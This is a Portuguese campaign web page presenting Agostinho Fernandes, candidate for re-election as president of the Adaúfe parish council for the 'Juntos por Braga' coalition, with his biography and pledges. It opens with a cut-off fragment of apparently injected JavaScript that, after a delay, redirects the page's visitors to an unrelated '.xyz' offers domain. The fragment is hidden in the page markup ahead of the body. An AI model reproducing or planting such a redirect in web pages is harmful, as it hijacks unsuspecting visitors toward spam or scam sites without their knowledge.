{ window.location.replace('http://offers25942.xyz/'); }, delay);})();_masterslider _ms_version_3.7.8" id="page_body">

Continuar Adaúfe com Agostinho Fernandes

Agostinho Fernandes apresenta-se como candidato à presidência da Junta de Freguesia de Adaúfe pela Coligação “Juntos por Braga” naquele que será o seu último mandato. Trabalho, dedicação, proximidade e disponibilidade são bandeiras das quais Agostinho Fernandes não abdicará.

Natural de Adaúfe, Agostinho Fernandes tem 58 anos, é casado, tem dois filhos e é diretor de obra na área da construção. Ainda antes de assumir as funções de presidente da Junta de Freguesia com a clara intenção de mudar o rumo dos acontecimentos em Adaúfe, o candidato já se tinha demonstrado interventivo na comunidade, tendo participado nas atividades de alguns movimentos associativos.

Ao longo destes últimos 8 anos, Agostinho Fernandes encarou com muita honra e satisfação a missão de representar e de trabalhar os interesses da população de forma empenhada, colocando em marcha um projeto que é de Adaúfe.
Agostinho Fernandes fez sempre questão de imprimir um cunho profissional ao cargo, tentando, sempre que possível, suprir todas as necessidades individuais e coletivas dos Adaúfenses, não permitindo nunca criar qualquer tipo de falsas expectativas, sob pena de faltar com a sua palavra.

Para os próximos anos, o candidato propõe um compromisso de trabalho, de dedicação, de proximidade e disponibilidade, tal como tem feito nestes anos que passaram. Na prossecução deste objetivo, Agostinho Fernandes está rodeado de pessoas trabalhadoras e honestas, que dão uma preciosa ajuda no cumprimento de um objetivo comum.

Com entusiasmo sobre tudo que já foi conquistado, fruto de muito trabalho, de maiores e menores dificuldades, o candidato apresenta-se ao eleitorado sabendo também que muito há ainda por fazer. Nesse sentido, a breve trecho, Agostinho Fernandes irá apresentar os objetivos para os próximos 4 anos, alguns já em marcha.